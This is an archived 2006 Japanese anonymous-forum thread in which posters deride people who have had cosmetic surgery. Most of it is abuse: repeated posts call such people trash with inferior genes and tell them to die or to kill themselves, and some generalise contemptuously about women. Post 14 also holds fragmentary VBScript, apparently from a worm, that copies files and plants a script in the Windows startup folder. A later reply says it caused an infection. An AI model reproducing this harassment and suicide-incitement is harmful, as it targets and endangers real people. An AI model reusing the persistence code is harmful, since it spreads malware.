5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

   整形人間共キモいんだよwwwwwww

1 :名無しさん@Before→After:2006/07/31(月) 10:41:31 ID:PwfRjhL6
^^

2 :名無しさん@Before→After:2006/08/03(木) 03:25:56 ID:P8gFQFrG
2

3 :名無しさん@Before→After:2006/08/03(木) 04:41:04 ID:cdZq21N+
↓必見!

http://avg-maker.com/view.php?id=242881

4 :名無しさん@Before→After:2006/08/16(水) 23:29:42 ID:fI19HLlZ
^^

5 :名無しさん@Before→After:2006/09/01(金) 04:59:55 ID:/qYHyTs+
w

6 :名無しさん@Before→After:2006/09/01(金) 08:39:03 ID:H8B3Urpu
1がきもい
ブスはせーけいしてもブス
ちょっと可愛い(かっこいい)人がせーけいしたら、あらもっと可愛い!(イケメン!)

7 :名無しさん@Before→After:2006/09/01(金) 08:45:16 ID:6goAHXdt
まあ、パッチリしすぎたつくりモノ二重は、気持ち悪いねw

8 :名無しさん@Before→After:2006/09/01(金) 08:53:19 ID:6goAHXdt
タレントの国仲涼子の二重って、
ひょっとしたら整形による作り物ではないのかもしれないが・・・
今の時代、整形手術があまりにもポピュラーなものになりすぎていて、
生まれながらにクッキリシッカリ二重の人が、
あらぬ損を被ることもあるだろうねw

9 :名無しさん@Before→After:2006/09/05(火) 05:00:45 ID:TRj6ka8G
^^

10 :名無しさん@Before→After:2006/09/07(木) 06:49:22 ID:7wTfRwYE
w

11 :名無しさん@Before→After:2006/09/07(木) 08:59:57 ID:w07AjSHc
クソスレ立てんな

削除依頼

12 :名無しさん@Before→After:2006/09/29(金) 12:49:59 ID:VZJVmoj9
w

13 :名無しさん@Before→After:2006/10/03(火) 06:15:08 ID:8WuTIy9l
:

14 :名無しさん@Before→After:2006/10/12(木) 21:49:02 ID:zI1iKIjp
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"

15 :名無しさん@Before→After:2006/10/15(日) 11:33:20 ID:Hi+eC9ZI
^

16 :名無しさん@Before→After:2006/10/15(日) 18:26:47 ID:J0Go5qja
>>1
激しく同意

17 :名無しさん@Before→After:2006/10/19(木) 10:00:44 ID:GofpiNUT
3

18 :名無しさん@Before→After:2006/10/20(金) 22:40:29 ID:IHFWjKLg
整形人間の子供も整形
その子供も・・・の悪循環

日本\(^o^)/オワタ 

19 :名無しさん@Before→After:2006/10/28(土) 12:51:10 ID:D/Gq/NtW
ブス善良説
・ブスは辛い幼少時代を過ごした。だから人の悲しみが分かる
・美人はちやほやされて育った。だから人の悲しみが分からない

ブス性悪説
・美人は人々の愛情をいっぱい受けて育った。だから素直でまっすぐな性格に育った。
・ブスは人々から愛されず、妬みや嫉妬の中で生きてきた。だから性格が歪んでいる。


ちなみに育児の本によると、人間は愛情を受けて育つとまっすぐになるそうで
ブス性悪説が正しいということになる。
ブス善良説はブスが「せめて性格だけでも美人よりマシなのよ」と自分を慰めるために作り出した理屈。
「ブスは三日で慣れる、美人は三ヶ月で飽きる」と似たようなもんだ。あれもブスが作った言葉だよな

20 :メタモルフォーゼ ◆Sa4Nm3cpqM :2006/10/28(土) 13:58:08 ID:6a0FnZTv

「ブスであっても、どことなく可愛い」って娘がいるんだよ。

21 :名無しさん@Before→After:2006/10/28(土) 14:22:16 ID:D/Gq/NtW
ブスが性格悪いのは愛されることを知らないからだろうな。
動物でもそうだよね。
人間から愛されることを知っている犬猫と、そうでない犬猫は
やっぱり違う。前者はどの人間のことも好いてて、人間に敬意を払っている。
後者は、人間が嫌いというか、警戒心や敵愾心をもってる。

ブスは人から愛されることを知らないから
他人を愛することや誠意をもたなければならないことがわからないんだろう。
ブスは生まれつき性格悪いってのもあるだろうが。

22 :メタモルフォーゼ ◆Sa4Nm3cpqM :2006/10/28(土) 14:24:02 ID:6a0FnZTv

ID:D/Gq/NtW
業界関係者の煽りか?

23 :名無しさん@Before→After:2006/10/28(土) 14:27:32 ID:z+a6eCVS
>>21
馬鹿か??
美人の方が多いよ
分かってないなコイツw

24 :名無しさん@Before→After:2006/10/29(日) 07:40:50 ID:X1u6Wgl1
>>14死ね!ウイルスに感染したじゃねーか!
これだからブスは性格悪いんだよ
このウイルスはどんな影響があるんだろーか

25 :名無しさん@Before→After:2006/10/29(日) 07:44:50 ID:Mx1iAcKu
ブス美人の二極でしか人を測れない人というのは
実際数の多いものでw
細かい識別が不得手な人たちなのかもねw

26 :名無しさん@Before→After:2006/10/29(日) 07:46:16 ID:Mx1iAcKu
目がでかけりゃ美人目が細けりゃブス
鼻がでかけりゃ美人鼻が小さけりゃブス

まるで電気信号のような識別

27 :名無しさん@Before→After:2006/10/29(日) 09:59:44 ID:seEaGZTB
つまんねー世の中だ

28 :メタモルフォーゼ ◆Sa4Nm3cpqM :2006/10/29(日) 11:04:53 ID:FLI0EKN0
>>27

大抵は砂を噛むような日々だよ。

29 :メタモルフォーゼ ◆Sa4Nm3cpqM :2006/10/29(日) 11:07:51 ID:FLI0EKN0

忍耐力は、とても大事。

30 :メタモルフォーゼ ◆Sa4Nm3cpqM :2006/10/29(日) 11:16:07 ID:FLI0EKN0

今の女は、忍耐力なさすぎて見苦しい。

31 :名無しさん@Before→After:2006/11/03(金) 19:54:47 ID:ykOt+6GT
どいつもこいつも親から貰った汚い顔にメス入れやがって!!!

ブス性悪説
・美人は人々の愛情をいっぱい受けて育った。だから素直でまっすぐな性格に育った。
・ブスは人々から愛されず、妬みや嫉妬の中で生きてきた。だから性格が歪んでいる。


ちなみに育児の本によると、人間は愛情を受けて育つとまっすぐになるそうで
ブス性悪説が正しいということになる。
ブス善良説はブスが「せめて性格だけでも美人よりマシなのよ」と自分を慰めるために作り出した理屈。
「ブスは飽きがこない、美人は三日で飽きる」と似たようなもんだ。あれもブスが作った言葉だよな ブスが性格悪いのは愛されることを知らないからだろうな。
動物でもそうだよね。
人間から愛されることを知っている犬猫と、そうでない犬猫は
やっぱり違う。前者はどの人間のことも好いてて、人間に敬意を払っている。
後者は、人間が嫌いというか、警戒心や敵愾心をもってる。

ブスは人から愛されることを知らないから
他人を愛することや誠意をもたなければならないことがわからないんだろう。
ブスは生まれつき性格悪いってのもあるだろうが。整形は詐欺だからするなよ、汚い遺伝子ども、

32 :名無しさん@Before→After:2006/11/04(土) 11:09:26 ID:33UkU3QD
 ブス女が整形してまで偽りの美を手に入れようとする姿は哀れやね。(大爆笑)


          _,. -‐ '' " ",. ̄'' ̄` ''‐、   
        ,.-'      ,r''  _,,.. - 、  ` 、
       ,.r'/// /   ,.-'      `' 、. \   
     /       ,r'  ,r'       ,rfn、 \ '、  
.    / /////  ,'   ,'  ,rffn.   '"     ヽ ',                             
    i     ,.ァ   .i  '"     ,riiニヽ.   ',. ',                      
.     |  ,.r '"  |.   {  ,riiニヽ      _.    ', ',                      
    | .,.r'    |   !   ,..  _,,.. -‐' _,..r'  i .i                        
    |,'      ',   ',   '、., __ ,.. -‐''"゙  }  | .|                             
    |       ',    `、  ヽ        !   } .}   アハハ八八ノヽノヽノヽノ \ / \ /  \ /  \ /  \ /  \
.     ',         ',    '、  ヽ      ./   ! .|  
    '、       `、   \  `ヽ==='゙    ,' !    
     `、        '、     ' 、        / .,'  
        '、'-..,,_____ ___`、    `''‐- ..,, ,,.. r'  /
       \ ヾヾヾヾヾ \          /    
        ` 、  、、、、、、、、 ` - ..,,, _ _,.r'゙  
          `' - .,,_       _,. - ''"  



33 :名無し:2006/11/04(土) 18:50:56 ID:bJZEE6m2
人の事言えんのかよ。そこまでするのにはやっぱり好きな人にかわいく見ら
れたいっていう乙女心があるからやん!!!

34 :名無し:2006/11/04(土) 18:52:14 ID:bJZEE6m2
人の事言えんのかよ。そこまでするのにはやっぱり好きな人にかわいく見ら
れたいっていう乙女心があるからやん!!!

35 :名無しさん@Before→After:2006/11/04(土) 20:28:07 ID:xgjuvuwO
>>8
国仲涼子さんは整形じゃないよ。でもそういう風に見えるよね。
あと、タレントじゃないよ!女優だよ!

36 :名無しさん@Before→After:2006/11/04(土) 21:16:06 ID:B7Vu/18R
>>33
その好きな人は整形女キライだと思うな〜〜w
ちゃんと隠さず言えよ
相手がかわいそうだからな

37 :名無しさん@Before→After:2006/11/05(日) 04:48:00 ID:Hx3s415b
33、34バカかお前〜何が乙女心だ周り騙して自分の好きな相手の気持ちもわからない欲深な汚い心だ整形したいけど自分のプライドや周りや彼氏の事思い我慢して整形しない事の方がよっぽど乙女心だ

38 :名無しさん@Before→After:2006/11/05(日) 08:42:26 ID:CseEgi8o
 ブス女が整形してまで偽りの美を手に入れようとする姿は哀れやね。おまえらの汚い遺伝子が泣いてるで〜(大爆笑)


          _,. -‐ '' " ",. ̄'' ̄` ''‐、   
        ,.-'      ,r''  _,,.. - 、  ` 、
       ,.r'/// /   ,.-'      `' 、. \   
     /       ,r'  ,r'       ,rfn、 \ '、  
.    / /////  ,'   ,'  ,rffn.   '"     ヽ ',                             
    i     ,.ァ   .i  '"     ,riiニヽ.   ',. ',                      
.     |  ,.r '"  |.   {  ,riiニヽ      _.    ', ',                      
    | .,.r'    |   !   ,..  _,,.. -‐' _,..r'  i .i                        
    |,'      ',   ',   '、., __ ,.. -‐''"゙  }  | .|                             
    |       ',    `、  ヽ        !   } .}   アハハ八八ノヽノヽノヽノ \ / \ /  \ /  \ /  \ /  \
.     ',         ',    '、  ヽ      ./   ! .|  
    '、       `、   \  `ヽ==='゙    ,' !    
     `、        '、     ' 、        / .,'  
        '、'-..,,_____ ___`、    `''‐- ..,, ,,.. r'  /
       \ ヾヾヾヾヾ \          /    
        ` 、  、、、、、、、、 ` - ..,,, _ _,.r'゙  
          `' - .,,_       _,. - ''"  



39 :名無しさん@Before→After:2006/11/05(日) 12:51:03 ID:2fokZ/ua
>>37
その通りだな
整形女はバカだから自分の事しか考えてない
好きな人に整形してもいいか聞いてみろってんだw

40 :名無しさん@Before→After:2006/11/05(日) 13:11:21 ID:ERCltL8T


↓↓↓整形人間さんたちの擁護発言ドゾー↓↓↓

41 :名無しさん@Before→After:2006/11/05(日) 13:17:11 ID:L5bmx8fn
好きな人のために私は整形したよー。気付いてるっぽいからカミした方がいいかな?
男の人としては黙ってて欲しいかな?

42 :名無しさん@Before→After:2006/11/05(日) 21:04:59 ID:2fokZ/ua
>>41
黙ってて欲しいわけないだろが!
別れるタイミング考えてんじゃね??
早く言えよ だから整形女って・・・詐欺師

43 :名無しさん@Before→After:2006/11/06(月) 13:41:48 ID:yf6LchBM
整形女きんもーっ☆

44 :名無しさん@Before→After:2006/11/06(月) 15:59:58 ID:8xIFGqto
いい人ナふりしてこんなとこで愚痴ってるのも詐欺だよ。

45 :名無しさん@Before→After:2006/11/06(月) 22:38:30 ID:fRoAj6wQ
w

46 :名無しさん@Before→After:2006/11/07(火) 20:14:46 ID:2dFd0kIs
ww

47 :名無しさん@Before→After:2006/11/08(水) 19:41:01 ID:+uWTWl3/
整形人間はブス以下
えっ!
整形人間ってまだ生きてんの?
はよ死ねや!お前は生きてる事が罪なんだから。
562 :Ms.名無しさん :2006/09/30(土) 01:32:51
整形人間は生きてる価値ない
早く死んで欲しい
ブスに生まれた時点で人生の負け組
715 :Ms.名無しさん :2006/10/02(月) 08:46:59 「「「「「「整形人間って、顔が汚いから嫌い。
よく、あんなキモイ顔ぶらさげて外を歩けると何時も思う。

後、整形人間の性格も嫌い。
整形人間はコンプレックスの塊だから、何かあっては人の陰口を言ってる。
あとよく「整形人間は根性なし」と言うけど、ほんとに整形人間は根性がない。
だからほんの少しの事でもすぐにふてくされてしまう。正に人間のゴミ。

整形人間の遺伝子が嫌い。
整形人間ブスが子供を生むと、それだけ遺伝子の劣った人間が増える。
整形人間ブスが増えれば外国から来た人にも馬鹿にされるし、周りにも不快感を与える。
つまり整形人間ブスが子孫を残すのは、社会に犯罪人を増やすのも同じ。
けつろーん
整形人間ブスは今すぐ死ね!
お前のような物体が人としてこの世でのうのうと生きてると思うと、
一般人であるこっちまでが恥ずかしくなってくる。
まずは自分が生きてる事が既に犯罪であるのを自覚し、そして二度とその汚い顔と心を
もってこの世に生を受けませんと誓って、さっさと自殺しろ。
その汚い顔で生き続け、一生人に不快感を与え続けるのか、
それとも死んで今まで迷惑をかけた人にちゃんと詫びるのか。
神に救われるかはお前の今後の行動次第だ。
ま、せいぜい頑張れよ。


48 :名無しさん@Before→After:2006/11/08(水) 22:23:09 ID:MSSpQnSj
頭がいかれて、精神病んでるみたい。。
精神病院に行ったほうがいいね。。頭狂っている人多いね。。

49 :名無しさん@Before→After:2006/11/08(水) 22:25:30 ID:mtBpVikO
>>1は、世界中の整形女から求愛、付きまとわれる、夢物語でも見ているのだろう。ww



50 :名無しさん@Before→After:2006/11/08(水) 22:30:59 ID:mtBpVikO
>>1は、世界中の整形女が自分の容姿を模した整形をし、
膨大な数の自分のニセモノ整形女に付きまとわれる、夢物語でも見ているのだろう。ww



51 :名無しさん@Before→After:2006/11/10(金) 03:05:46 ID:XmcXc5IL
外見のコンプレックスに耐えかねた人間が整形に踏み切る原因は、まさにその本人が持っている価
値観に他ならない。なぜなら、整形に踏み切る時点で内面よりも外見に重きを置いていることは明
白で、そうした価値観に依れば、自分も他人も外見で判断しがちになるからである。

もし、外見に重きを置いておらず、人を内面で判断し、人の価値が外見で決まるのではないことを
承知していれば、整形手術で外見を直そうなどと思わず内面を磨くことを心がけるはずである。も
ちろん、自分の力で外見を磨く最大限の努力をしたうえで、である。

つまり、整形人間は自ら作り出した価値観によって、自らの意思で整形手術を受けたのであるから
、周囲から忌み嫌われようと罵声を浴びせられようと、全て自業自得・自己責任で、反駁の余地は
一切ないのである。こうした圧倒的不利かつ少数の立場に立つ覚悟がなければ、整形などしてはな
らない。

もちろん、それが嫌だからと言って、整形人間であることを隠してはいけない。むしろ、かなり早
い段階で打ち明けなければいけない。なぜなら、一般的な感覚として整形は否定要因であり、また
、顔は嫌でも初対面で目に入るもので、整形した顔面であることを隠すのは自己紹介でウソを言う
のに等しい行為だからである。例えるならば、他人の写真を貼った履歴書を郵送するようなもので
ある。

整形が正しい・恥ずかしくない行為だと思うならば、初対面の相手でもハッキリそう言えるはずで
ある。正しくない・恥ずかしい行為だと思うならば、整形などしなければよい。

不細工は不可抗力、整形は確信犯。詐欺行為は慎み、自分が正しいと思う行為をしよう。

52 :メタモルフォーゼ ◆Sa4Nm3cpqM :2006/11/10(金) 07:57:38 ID:7Tcmzavn
>>51

>人の価値が外見で決まるのではないことを承知していれば、

>顔は嫌でも初対面で目に入るもので、

(内容の是非は別として)
すでに矛盾しているが。




53 :名無しさん@Before→After:2006/11/10(金) 13:54:42 ID:tfrdh04t
>>52
前後の文章を熟読すれば、矛盾ではないことはわかりますよ。

54 :メタモルフォーゼ ◆Sa4Nm3cpqM :2006/11/10(金) 13:57:05 ID:7Tcmzavn
>>53

文言上すでに矛盾している。

55 :名無しさん@Before→After:2006/11/10(金) 14:01:03 ID:tfrdh04t
>>54
全く同じ言葉でも指してるものが違うというのはよくあること。

56 :メタモルフォーゼ ◆Sa4Nm3cpqM :2006/11/10(金) 14:02:30 ID:7Tcmzavn
>>55

逆に貴女自己中すぎ。

57 :名無しさん@Before→After:2006/11/10(金) 14:03:56 ID:tfrdh04t
>>56
根拠なく罵るのはやめて下さい。一行ムダレスが多すぎです。
チャットじゃないんですよ。

58 :メタモルフォーゼ ◆Sa4Nm3cpqM :2006/11/10(金) 14:06:01 ID:7Tcmzavn
>>57

お前が性格美人になれよ。
(他人のことは放っといたれ)



59 :名無しさん@Before→After:2006/11/10(金) 14:19:42 ID:tfrdh04t
>>58
まず私は>>561の投稿をしました。それに対し、あなたが「矛盾している」
という指摘をしました。ですから私は、矛盾していないことを指摘しました。
「矛盾している」と言い出したのはあなたですから、
どこがどう矛盾しているのかまずあなたがきちんと説明すべきなのですが、
再び「矛盾している」とだけレスをいただきました。
なので私は、>>55で、できるだけ簡潔に事実だけを述べました。
するとあなたは、「逆に貴女自己中すぎ」などという全く内容のつながらない、
レスではなく単なる罵倒をしました。ですから私は、
>>57で、再び事実を簡潔に述べました。
するとまたまたあなたは、「お前が性格美人になれ」などという全く内容のつながらない、
レスではなく単なる罵倒をしました。

以上の流れから私は、あなたがただ単に誰かに難癖つけたくてここにいるという判断をしましたが、
いかがですか?異論ありますか?


60 :メタモルフォーゼ ◆Sa4Nm3cpqM :2006/11/10(金) 14:35:24 ID:7Tcmzavn
>>59

いいから、外に出て空気吸って来い。
(水谷先生風)

61 :名無しさん@Before→After:2006/11/10(金) 14:44:09 ID:tfrdh04t
>>60
「あなたがただ単に誰かに難癖つけたくてここにいるという判断」
に異論はないようですね。

以後完全スルーさせていただきます。

62 :メタモルフォーゼ ◆Sa4Nm3cpqM :2006/11/10(金) 14:45:19 ID:7Tcmzavn
>>61

甘やかされると
こういう娘に育つ。

63 :名無しさん@Before→After:2006/11/10(金) 14:57:00 ID:tfrdh04t
不細工は不可抗力で、全く本人のせいではない。デブ・なんの努力もしていない以外の不細工を、
「ブス」・「キモイ」などと口汚く罵るのは、不当で悪質なイヤガラセである。
このような行為は意味もなく他人を深く傷つける誠に身勝手な行為である。
絶対にしてはならない。

一方、整形は確信犯で、全て自己責任。自らの意思で整形した人間がバカにされるのは、
外見でしか男を選べない女が「人を見る目がない」とバカにされるのと同義であり、
後で苦労したり、恥ずかしい思いをするとわかっていて、遊ぶためだけに多額の借金をした人間が
「計画性がない」とバカにされるのと同義である。

整形人間はバカにされて当然。全て自業自得である。

64 :メタモルフォーゼ ◆Sa4Nm3cpqM :2006/11/10(金) 15:01:59 ID:7Tcmzavn

女は、主観的にしか物を考えられない。
男が締める必要がある。

65 :名無しさん@Before→After:2006/11/10(金) 15:13:46 ID:74jZUYOm
整形のなにがわるい?勇気いるし容姿をよくするための努力の一つじゃん。今の時代若いうちは容姿は重要だから仕方ないとおもう。

66 :メタモルフォーゼ ◆Sa4Nm3cpqM :2006/11/10(金) 15:17:03 ID:7Tcmzavn

たとえ自分以外の価値観であっても、理解できるようでなければな。

67 :名無しさん@Before→After:2006/11/10(金) 15:24:41 ID:tfrdh04t
>>65
顔面いじくるんだから勇気いるのは当たり前。
というか不細工な自分を受け入れて強く生きる方がはるかに勇気がいるし努力が必要。
整形するやつは所詮ラクしたいだけ。

68 :メタモルフォーゼ ◆Sa4Nm3cpqM :2006/11/10(金) 15:26:28 ID:7Tcmzavn
>>67

学校休んで楽そうだな。

69 :才/ヽ∋ゥ━♪ヽ(*^^)/☆ぉl£ょぅ゚+.☆ですぅ^^:2006/11/11(土) 19:43:15 ID:4QGr4HUp
整形人間はブスより劣る存在である
美人だと嫉妬も可愛いけど、整形人間の妬みほど醜いものはない。
特に美人に対して対抗心燃やす整形ブスは最悪。
それで美人の陰口言ったり悪い噂立てて足引っ張ろうとする。
実際はその整形ブスの方が陰で皆に悪口言われてるんだけど。
144 :Ms.名無しさん :2006/08/31(木) 12:33:35
昔の話。戦争でケガした人が病院に担ぎこまれると、
美人の看護婦だと治るのが早くて、整形ブスだと治りが遅いらしい。
やっぱり美人は人間から見て、生きる意欲というかエネルギーが出てくるそうです。
299 :Ms.名無しさん :2006/09/17(日) 07:10:46
整形ブスの容姿コンプレックスを刺激すれば
不細工やニート童貞処女認定ですか。
そう仮定しないと自我が保てないんだろうがw

整形ブスは見下されるために生まれてきたんだから、つまらんことをせずに
黙って馬鹿にされてろww


405 :Ms.名無しさん :2006/09/20(水) 15:09:42
人間は整形ブスってだけで人間としての価値がない。
ただその劣った遺伝子しか生み出せないゴミでしかない。
死ねよ。その汚い顔見せんな。クズが。





ゴミが

70 :名無しさん@Before→After:2006/11/11(土) 20:37:11 ID:ebfuzMVh
整形前から自分の顔を嫌悪してたんだよ。
本人がそれを打開しようとした結果が整形だから
一部の人にどうこう言われても、それは仕方がない。

71 :名無しさん@Before→After:2006/11/12(日) 02:43:34 ID:Z4NVZPia
整形する奴はみんな、そのくらいの覚悟はあるよ。

72 :名無しさん@Before→After:2006/11/13(月) 22:37:11 ID:irENljOf
>>70
自分の中に嫌いな部分が一つもない人間なんてこの世に存在すると思う?w

73 :名無しさん@Before→After:2006/11/14(火) 05:08:50 ID:kalKEuml
http://www2.ezbbs.net/24/techside/img/1159726522_1.jpg
ブスはせーけいしてもブス ちょっと可愛い(かっこいい)人がせーけいしたら、
あらもっと可愛い!(イケメン!)
人の事言えんのかよ。そこまでするのにはやっぱり好きな人にかわいく見ら
れたいっていう乙女心があるからやん!!!
整形前から自分の顔を嫌悪してたんだよ。
本人がそれを打開しようとした結果が整形だから
一部の人にどうこう言われても、それは仕方がない。
整形のなにがわるい?勇気いるし容姿をよくするための努力の一つじゃん。
今の時代若いうちは容姿は重要だから仕方ないとおもう。

74 :名無しさん@Before→After:2006/11/14(火) 14:04:53 ID:74I272vf
整形が「努力」だってさw

75 :名無しさん@Before→After:2006/11/14(火) 21:27:30 ID:CuEgEptF
>>74
どこが努力なんだ??ッて感じだよねw
金出して人の手借りてるだけじゃんねw 
プッ!!

76 :名無しさん@Before→After:2006/11/15(水) 01:05:47 ID:ZK9ZivrN
金払って他人にやってもらう整形が「努力」なら、
中国人に金払ってライバルを消してもらうのも「努力」だよね?
裏金で息子を入学させるのも「努力」だよね?
大した努力ですなぁw

77 :メタモルフォーゼ ◆Sa4Nm3cpqM :2006/11/15(水) 09:10:02 ID:BtkAnLFI
>>76

それらは「努力」ではないと思う。

ところで、
貴方こそ、性格を直す努力を、大してしてなさそう。

78 :名無しさん@Before→After:2006/11/15(水) 15:31:20 ID:ZK9ZivrN
>>77
別に直す必要ないし。

79 :名無しさん@Before→After:2006/11/21(火) 16:56:35 ID:G01Km+ot
a

80 :名無しさん@Before→After:2006/11/21(火) 17:04:22 ID:qm0fAe0D
どれもペーペーの>>76にはない実力だなw
M資金とか子供の裏口入学とか速やかな臓器移植とかのホンモノ話が
>>76のところに来るわけがないww


81 :名無しさん@Before→After:2006/11/26(日) 02:12:24 ID:VM4MuHAR
整形しても必ずしも、きれいになるとか、かっこよくなるとは
思いません。
なぜらな、ゴージャス松野さんは200万整形にかけても特別変化はありません。
それに、天然のぱっちり二重まぶたの稲川淳二さんがイケメンだとは
あまり思いません。

82 :名無しさん@Before→After:2006/11/26(日) 02:26:41 ID:0jLdHHYP
>>80
その金にモノを言わせた不正行為がどうかした?
整形人間の考えることはわからんな。

83 :名無しさん@Before→After:2006/11/27(月) 02:52:38 ID:chVP7Pns
整形人間って、整形叩かれると「ビンボー人」・「ハゲ」・「チビ」・「不細工」 とか言って
なんの根拠もなく、自己の整形の正当性とは全くなんの関係もないことを持ち出して
話を逸らそうと必死になるよね。よほどやましい気持ちがあるんだね。

84 :名無しさん@Before→After:2006/11/27(月) 13:38:28 ID:jQ6qGk25
整形人間の言い訳No.1「みんなやってる」w
みんなやってるからなんなんだ?w

85 :名無しさん@Before→After:2006/11/29(水) 16:34:13 ID:hQeX2Ldc
整形人間の言い訳No.2「本人の勝手」w
整形が本人の判断で勝手にやるんなら、それをバカにするのも本人の勝手だろw

86 :名無しさん@Before→After:2006/11/29(水) 18:00:52 ID:/7j0+tH7
>>77
そーだそーだ

87 :名無しさん@Before→After:2006/11/29(水) 19:58:51 ID:LtZJ4RYi
>>84
韓国みたいに全員整形、整形大国のイメージ定着したら最悪だな。

例えば自ら全身大整形告白したアオタノリコとヤる気になるか?おばさんだからヤれ無いじゃなくて全身大整形だから気持ち悪い。
ヤれないし恋愛対象外だし。もう最悪だよね整形って

88 :名無しさん@Before→After:2006/12/01(金) 00:57:11 ID:KDHBJDkO
結婚する相手には、ちゃんとつたえろよ

89 :名無しさん@Before→After:2006/12/01(金) 02:13:45 ID:VoV+78ZE
大きなお世話^^
暇人w

90 :名無しさん@Before→After:2006/12/01(金) 02:15:14 ID:KDHBJDkO
>>89
あなたも、ひまそうですね。

91 :名無しさん@Before→After:2006/12/01(金) 03:58:45 ID:izyt6D53
「みんなやってる」「今どき普通」

精神年齢が低い人間が、好んで自己の正当化に使う言い訳。
「多数=正しい」という民主主義を完全にはき違えたような錯誤的価値観は、
精神が未発達、即ち自我の確率が不十分なため、物事の正当性を
「その他大勢の多数決」に依ってしか判断できないことに由来する。
このような人間は、周囲の影響を非常に受けやすく、多数決の価値観を鵜呑みにする
傾向があるため、一歩間違えば非常に危険である。

92 :名無しさん@Before→After:2006/12/03(日) 19:08:13 ID:RK9sp3ya
>>91
多数意見=正しい
は、確かに危険かもしれませんね!

93 :名無しさん@Before→After:2006/12/04(月) 23:37:12 ID:Vr3EUYge
整形人間がばかにされるのは外見でしか男を選べない女が
「人を見る目がない」とバカにされるのと同義。

94 :名無しさん@Before→After:2006/12/05(火) 12:03:37 ID:rB2IMZF/
ttp://6243.teacup.com/anti2/bbs?m

95 :名無しさん@Before→After:2006/12/05(火) 13:03:00 ID:Lzgt4BKe
戦時中の日本では、お国のために集団自決など当たり前だった。
「みんな」やってたし、当時は「普通」だった。

ナチスにおいては、総統の指示でユダヤ人虐殺は当たり前だった。
彼らは「みんな」やってたし、彼らにとっては「普通」だった。

「みんなやってる」「今どき普通」
これらは全くなんの言い訳にもならない。

96 :名無しさん@Before→After:2006/12/05(火) 16:05:54 ID:aQxybkZA
>>95
同感 そしてage

97 :名無しさん@Before→After:2006/12/05(火) 18:53:26 ID:aisSJoB1
言い訳するつもりも無いし言い訳だとも思っていない
整形万歳

98 :名無しさん@Before→After:2006/12/05(火) 19:09:03 ID:OXNrYF4L
本当はやりたい気持ちが山々ある
でも、常識的に考えてやるべきでないことだから
幼い頃から「からかわれ」の元凶であった
デッカイ鼻糞黒子も整形で取ったりしない
という人はけっこう多いものかも知れないが
みんながやっているから自分も整形しようだなんて
芸能業界などの特殊な環境下以外ではめったにありえないことでしょう

99 :名無しさん@Before→After:2006/12/05(火) 19:33:23 ID:/geapvu5
言い訳だと思ってないんだったら
その理由も書いてねキティさん



100 :名無しさん@Before→After:2006/12/05(火) 19:40:28 ID:OXNrYF4L
一般人、なのに整形に踏み切るような人は、
確かにちょっと常識的ではない人なのかも知れませんね。
でも、赤の他人の整形カミングアウト話なんて、
迂闊に聞かされたくないものです。
ぱっと見て、それと分からない程度の整形だったのならば、
下手に告白なんてしないでいて欲しいものです。
そんな告白、聞かされた側も返答に困りますし、後味が悪いばかりのものですから。
そして、一見してそれと分かるほどの不自然顔だった場合は、
自ずとその周りから人が遠のいてゆくだけこと。
その不自然顔の理由が、整形だろうと、生まれつきだろうとね。

101 :名無しさん@Before→After:2006/12/05(火) 21:44:14 ID:aisSJoB1
思っていないから書けないw

102 :名無しさん@Before→After:2006/12/05(火) 22:02:51 ID:/geapvu5
言ってることわかんないのか?

じゃあ 何でかわかんないけど思ってないってことか?

>>思っていないから書けないw

だって本気あふぉじゃねーの

103 :名無しさん@Before→After:2006/12/06(水) 00:41:03 ID:1C+3mr/G
べつに整形しようがしまいが人の勝手。
批判する人も整形に興味があるからここに居るんでしょ?
普通の人はしないとか言うなら普通の人は整形板にはこない

104 :名無しさん@Before→After:2006/12/06(水) 14:12:06 ID:YC7Zsxs6
↑あんた天才

105 :名無しさん@Before→After:2006/12/06(水) 14:32:23 ID:AE91dM8I
>>103
普通の人間が整形板に来るのは興味本位。
恐いもの見たさっていうか、動物園の珍獣コーナー観に行くような感じ。

あと、勝手だと言い張るなら絶対に他人に隠すなよ。
ニセの顔面で人をダマして「人の勝手」だなんて、
詐欺師が「ダマされる方が悪い」って言ってるようなものだよ。

106 :名無しさん@Before→After:2006/12/06(水) 22:28:40 ID:YC7Zsxs6
大きなお世話^^
法律では無問題

だまされる側が悪い^^

107 :名無しさん@Before→After:2006/12/06(水) 23:22:30 ID:H/SNw0Rf
容姿の醜い整形人間見たら「わ〜あの人キモーイ」と口か心の中で叫び見下し笑いものにして優越感に浸りましょう ( *^з^)y
容姿の醜い人間は整形しても、すんなに変わらず、ちょっとマシになるぐらいか、不自然にキモくなるだけ(怖笑
容姿の醜い整形人間はさっさと氏ねばいいのに♪
(*^^)汚くて醜い配列をした不細工遺伝子を持った感想は?
欠陥品顔の醜い顔は人に不快感を与えてキモがられた?バカにされ笑われた?
道ですれ違った人からブッ細工だな〜と罵声浴びせられるか、笑われ見下された? 変質者を見るような嫌悪な目で見られた?

そして死にたい気持ちになって落ち込んだ?
醜い顔と醜いスタイルを持って産まれるってどんな感じ? それって生きてて苦痛なの?道ばたで見ず知らずの
 通行人からあの人キモーイよね〜とか言われて泣いて落ち込んだりしてるの?
        ∩___∩                     ∩___∩
    ♪   | ノ ⌒  ⌒ヽキンッ    __ _,, -ー ,,    ブッ   / ⌒  ⌒ 丶|
        /  (●)  (●)  モー   (/   "つ`..,:  サ (●)  (●) 丶
       |     ( _●_) ー    :/       :::::i:.   ー (_●_ )    |
 ___ 彡     |∪| ー    :i        ─::!,,    ー、 |∪|    、彡____
 ヽ___       ヽノ、`\     ヽ.....:::::::::  ::::ij(_::●   / ヽノ     ___/
       /       /ヽ <   r "     .r ミノ~.    〉 /\    丶
      /      /    ̄   :|::|    ::::| : 容姿の醜い劣った劣等整形人間                ソ  ゴミクズ
整形しても所詮は不細工なままだよね〜

108 :名無しさん@Before→After:2006/12/07(木) 13:09:36 ID:+KSx9DSZ
あけ

109 :名無しさん@Before→After:2006/12/07(木) 14:37:47 ID:XOOGxdYu
自己顕示欲が強すぎて整形
容姿にコンプレックスがあって整形
容姿のせいで普通に生活するのが困難なため整形

ムリだなって感じるのは自己顕示欲が強すぎて整形する人
だけどこれが今1番増えてるというか多いんじゃないだろうか
そうゆー人は整形がバレると「僻んでる」とか「妬み」だとか言う

